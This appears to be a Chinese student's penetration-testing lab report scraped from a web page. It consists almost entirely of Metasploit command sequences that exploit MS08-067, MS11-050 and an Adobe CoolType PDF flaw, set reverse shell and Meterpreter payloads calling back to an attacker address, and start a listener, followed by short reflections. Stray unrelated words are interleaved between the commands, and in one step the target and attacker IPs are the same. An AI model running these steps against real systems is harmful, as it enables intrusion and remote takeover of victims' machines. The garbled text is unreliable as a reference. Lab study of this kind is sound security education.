在攻擊機kali輸入msfconsole進入控制檯,依次輸入如下指令:
msf > use exploit/windows/smb/ms08_067_netapi
html
msf exploit(ms08_067_netapi) > show payloads
shell
msf exploit(ms08_067_netapi) > set payload generic/shell_reverse_tcp //tcp反向回連
windows
msf exploit(ms08_067_netapi) > set LHOST 192.168.43.161 //攻擊機ip
api
msf exploit(ms08_067_netapi) > set LPORT 5213 //攻擊端口
瀏覽器
msf exploit(ms08_067_netapi) > set RHOST 192.168.43.161 //靶機ip,特定漏洞端口已經固定
安全
msf exploit(ms08_067_netapi) > set target 0 //自動選擇目標系統類型,匹配度較高
網絡
msf exploit(ms08_067_netapi) > exploit //攻擊
tcp
在攻擊機kali輸入msfconsole進入控制檯,依次輸入如下指令:
msf > use windows/browser/ms11_050_mshtml_cobjectelement
網站
msf exploit(ms11_050_cobjectelement) > set payload
windows/meterpreter/reverse_http //http反向回連
加密
msf exploit(ms11_050_cobjectelement) > set LHOST 192.168.43.161 //攻擊機ip
msf exploit(ms11_050_cobjectelement) > set LPORT 5213 //攻擊端口固定
msf exploit(ms11_050_cobjectelement) > set URIPATH 5213lzm //統一資源標識符路徑設置
msf exploit(ms11_050_cobjectelement) > exploit
在攻擊機kali輸入msfconsole進入控制檯,依次輸入如下指令:
msf > use windows/fileformat/adobe_cooltype_sing
msf exploit(adobe_cooltype_sing) > set payload
windows/meterpreter/reverse_tcp //tcp反向回連
msf exploit(adobe_cooltype_sing) > set LHOST 192.168.43.161 //攻擊機ip
msf exploit(adobe_cooltype_sing) > set LPORT 5213 //攻擊端口
msf exploit(adobe_cooltype_sing) > set FILENAME 5213lzm.pdf //設置生成pdf文件的名字
msf exploit(adobe_cooltype_sing) > exploit //攻擊
在kali上輸入back退出當前模塊,進入監聽模塊,輸入如下命令:
msf > use exploit/multi/handler //進入監聽模塊
msf exploit(handler) > set payload windows/meterpreter/reverse_tcp //tcp反向鏈接
msf exploit(handler) > set LHOST 192.168.43.161 //攻擊機ip
msf exploit(handler) > set LPORT 5213 //攻擊端口固定
msf exploit(handler) > exploit
該模塊使用發送TCP SYN標誌的方式探測開放的端口。下面是我掃描到了個人靶機、
如何將後門文件安全傳輸或者瞭解靶機漏洞狀況,這個是我認爲距離實戰有差距的地方。
此次的實驗讓我感受又距離實際操做進了一步,應用到了許多常見的漏洞。可是咱們仍是比較侷限於msf的一些模塊,並且把生成的文件圖標啊弄到靶機上也比較難,因此期待下一次的實驗能有新的突破。